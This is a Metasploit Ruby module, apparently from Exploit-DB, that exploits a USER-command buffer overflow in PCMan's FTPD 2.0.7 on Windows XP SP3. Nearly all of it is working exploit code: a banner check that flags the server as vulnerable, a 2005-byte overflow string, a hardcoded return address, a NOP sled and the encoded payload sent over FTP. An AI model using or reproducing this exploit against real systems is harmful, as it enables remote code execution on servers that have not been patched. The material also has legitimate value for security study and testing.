# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,'Name' => 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description'=> %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.},'Author' => 'MSJ <matt.jones.85[at]gmail.com>','License'=> MSF_LICENSE,'DefaultOptions' =>
{'EXITFUNC' => 'thread'},'Payload'=>
{'Space'=> 2005,'BadChars' => "\x53\x93\x42\x7E",'StackAdjustment' => -3500,},'Platform' => 'win','Targets'=>
[# Target 0['Windows XP SP3 English',{'Ret'=> 0x7e429353 # push esp, ret}]],'Default Target' => 0))end
def check
connect
disconnect
if(banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V')+ make_nops(16)+ payload.encoded
send_cmd([sploit], false )
handler
disconnect
endend
